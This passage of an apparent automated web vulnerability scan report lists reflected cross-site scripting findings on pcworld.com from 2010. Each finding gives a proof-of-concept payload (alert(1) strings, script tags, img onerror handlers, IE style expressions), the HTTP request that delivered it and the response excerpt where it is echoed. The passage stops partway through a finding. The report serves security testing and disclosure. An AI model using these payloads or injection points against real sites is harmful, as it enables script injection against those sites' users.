Host:	http://www.pcworld.com
Path:	/reviews/product/644407/review/canon_pixma_mg8120.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f69f8'-alert(1)-'6f3aac636b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/644407/review/canon_pixma_mg8120.htmlf69f8'-alert(1)-'6f3aac636b6 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E199113E6E652C5E03C422CED78FB695; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/644407/review/canon_pixma_mg8120.htmlf69f8'-alert(1)-'6f3aac636b6';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.159. http://www.pcworld.com/reviews/product/655414/review/epson_artisan_835.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/655414/review/epson_artisan_835.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9812d'-alert(1)-'985c40ebc8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/655414/review9812d'-alert(1)-'985c40ebc8d/epson_artisan_835.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:08:45 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2AC5D8B2C6A13E84929CA189F6463CC3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/655414/review9812d'-alert(1)-'985c40ebc8d/epson_artisan_835.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.160. http://www.pcworld.com/reviews/product/655414/review/epson_artisan_835.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/655414/review/epson_artisan_835.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b3df'-alert(1)-'1dd3cbd432e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/655414/review/epson_artisan_835.html9b3df'-alert(1)-'1dd3cbd432e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/655414/review/epson_artisan_835.html9b3df'-alert(1)-'1dd3cbd432e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.161. http://www.pcworld.com/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1542c'-alert(1)-'af3060bc4ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/664603/review1542c'-alert(1)-'af3060bc4ed/mitsubishi_unisen_lt46265_46inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:34 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FBD195EA5954DC38937AF4BE39A6D0A6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/664603/review1542c'-alert(1)-'af3060bc4ed/mitsubishi_unisen_lt46265_46inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberUR
...[SNIP]...

1.162. http://www.pcworld.com/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 733d8'-alert(1)-'bb990b85223 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html733d8'-alert(1)-'bb990b85223 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFF6EB884ECCC25FD4CD4578EA0AECB3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
n.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html733d8'-alert(1)-'bb990b85223';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.163. http://www.pcworld.com/shopping/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bba1'-alert(1)-'bb9264dfb30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping7bba1'-alert(1)-'bb9264dfb30/ HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:16:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping7bba1'-alert(1)-'bb9264dfb30/';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=
...[SNIP]...

1.164. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23583"><script>alert(1)</script>f5d2eb25cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping23583"><script>alert(1)</script>f5d2eb25cdb/browse/category.html?id=10010 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:21:52 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping23583"><script>alert(1)</script>f5d2eb25cdb/browse/category.html?id=10010"/>
...[SNIP]...

1.165. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdc7d'-alert(1)-'0f20bfb9fd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shoppingcdc7d'-alert(1)-'0f20bfb9fd2/browse/category.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:21:20 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=44A0F3B7E9EF175FDC7F022C01880B25; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shoppingcdc7d'-alert(1)-'0f20bfb9fd2/browse/category.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.coo
...[SNIP]...

1.166. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21292'-alert(1)-'28667fac2d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/browse21292'-alert(1)-'28667fac2d0/category.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:21:25 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/browse21292'-alert(1)-'28667fac2d0/category.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "
...[SNIP]...

1.167. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9113b"><script>alert(1)</script>7606114cf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/browse9113b"><script>alert(1)</script>7606114cf3/category.html?id=10010 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:22:10 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FA1BFC4236ACBE82EFAA45D2434D05E9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:22:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse9113b"><script>alert(1)</script>7606114cf3/category.html?id=10010"/>
...[SNIP]...

1.168. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204c0'-alert(1)-'4c75989dddc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/browse/category.html204c0'-alert(1)-'4c75989dddc HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:21:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/browse/category.html204c0'-alert(1)-'4c75989dddc';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.169. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79efa"><script>alert(1)</script>50ff00da204 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/browse/category.html79efa"><script>alert(1)</script>50ff00da204?id=10010 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E717CC084342E04DDA4BD625F4545482; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:22:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse/category.html79efa"><script>alert(1)</script>50ff00da204?id=10010"/>
...[SNIP]...

1.170. http://www.pcworld.com/shopping/browse/category.html [filter parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97d02'style%3d'x%3aexpression(alert(1))'e85fc47a3a8 was submitted in the filter parameter. This input was echoed as 97d02'style='x:expression(alert(1))'e85fc47a3a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shopping/browse/category.html?id=10061&filter=popup5[],1:27397d02'style%3d'x%3aexpression(alert(1))'e85fc47a3a8 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:25:06 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=0738FB2E56DEDC80FCA9CE1553B3E8BB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:25:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<a href='/shopping/browse/category.html?id=10061&filter=popup5[],1:27397d02'style='x:expression(alert(1))'e85fc47a3a8|vendors[],PG3M' rel="nofollow" >
...[SNIP]...

1.171. http://www.pcworld.com/shopping/browse/category.html [filter parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05dd"><img%20src%3da%20onerror%3dalert(1)>ec11cf46628 was submitted in the filter parameter. This input was echoed as f05dd"><img src=a onerror=alert(1)>ec11cf46628 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /shopping/browse/category.html?id=10061&filter=popup5[],1:273f05dd"><img%20src%3da%20onerror%3dalert(1)>ec11cf46628 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:23:57 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:23:57 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse/category.html?id=10061&filter=|popup5[],1:273f05dd"><img src=a onerror=alert(1)>ec11cf46628"/>
...[SNIP]...

1.172. http://www.pcworld.com/shopping/browse/category.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 829be"><script>alert(1)</script>3aa4dd0ad48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/browse/category.html?id=10010&829be"><script>alert(1)</script>3aa4dd0ad48=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:37 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse/category.html?id=10010&829be"><script>alert(1)</script>3aa4dd0ad48=1"/>
...[SNIP]...

1.173. http://www.pcworld.com/shopping/browse/category.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/browse/category.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb273"-alert(1)-"5ad24fe7461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/browse/category.html?id=10010&eb273"-alert(1)-"5ad24fe7461=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:51 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8E08AE9A995C8DDD74810F8DA17180C3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:51 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<script>
                   function sortBy (val) {
                       if (val != "") {val = "&sortby="+val;}


                                                           location.href= "/shopping/browse/category.html?id=10010&eb273"-alert(1)-"5ad24fe7461=1"+val;


                   }
               </script>
...[SNIP]...

1.174. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 584cd'-alert(1)-'6c29b9ca6f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping584cd'-alert(1)-'6c29b9ca6f2/detail/prtprdid,740315697-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:15 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=735CA7E2BC28783BE49167CA69687990; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping584cd'-alert(1)-'6c29b9ca6f2/detail/prtprdid,740315697-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.175. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

